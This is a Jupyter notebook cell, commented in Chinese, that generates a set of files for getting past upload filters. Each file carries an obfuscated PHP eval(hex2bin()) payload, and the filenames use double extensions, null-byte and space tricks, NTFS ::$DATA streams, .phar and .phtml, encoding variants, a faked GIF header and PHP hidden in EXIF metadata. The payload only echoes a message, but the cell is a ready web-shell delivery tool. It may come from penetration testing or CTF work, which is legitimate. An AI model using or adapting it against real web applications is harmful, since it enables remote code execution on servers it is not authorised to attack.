In [ ]:
import os
from PIL import Image
import piexif

# 加强版：轻度混淆PHP代码（base64 + eval）
real_code = 'echo "Upload successful. PHP parsed!";'
b64 = real_code.encode("utf-8").hex()
php_payload = f'<?php eval(hex2bin("{b64}")); ?>'

# 输出目录
output_dir = "bypass_upload_files"
os.makedirs(output_dir, exist_ok=True)

# 文件名列表增强（包含双扩展、NTFS流、空格、编码绕过）
filenames = [
    "shell.php",
    "shell.pHp",
    "shell.php.jpg",
    "shell.jpg.php",
    "shell.php;.jpg",
    "shell.phar",
    "shell.phtml",
    "shell.php%00.jpg",
    "shell.jpg",             # 图片+伪装PHP
    "shell_exif.jpg",        # EXIF携带PHP
    "shell.php%20.jpg",      # 空格绕过
    "shell.php::$DATA",      # NTFS流（Windows特有）
    "shell_utf16.php",       # UTF-16编码测试
    "shell_bom.php"          # UTF-8 BOM测试
]

def write_php(filename, content, encoding="utf-8-sig"):
    with open(os.path.join(output_dir, filename), "w", encoding=encoding) as f:
        f.write(content)

def write_php_with_gif_header(filename):
    gif_header = b"\x47\x49\x46\x38\x39\x61"  # GIF89a
    payload = gif_header + b"\n" + php_payload.encode()
    with open(os.path.join(output_dir, filename), "wb") as f:
        f.write(payload)

def write_exif_php(filename):
    # 创建一个图片，写入 PHP 到 EXIF
    image_path = os.path.join(output_dir, filename)
    image = Image.new("RGB", (100, 100), color=(255, 255, 255))
    exif_dict = {"0th": {piexif.ImageIFD.ImageDescription: php_payload.encode("utf-8")}}
    exif_bytes = piexif.dump(exif_dict)
    image.save(image_path, "jpeg", exif=exif_bytes)

# 写入文件
for name in filenames:
    if "utf16" in name:
        write_php(name, php_payload, encoding="utf-16")
    elif "bom" in name:
        write_php(name, php_payload, encoding="utf-8-sig")
    elif "jpg" in name and "exif" not in name:
        write_php_with_gif_header(name)
    elif "exif" in name:
        write_exif_php(name)
    else:
        write_php(name, php_payload)

print(f"✅ 已生成增强测试上传文件，共 {len(filenames)} 个，保存于：{output_dir}/")


✅ 已生成测试上传文件，共 10 个，保存于：bypass_upload_files/


In [3]:
!pip install piexif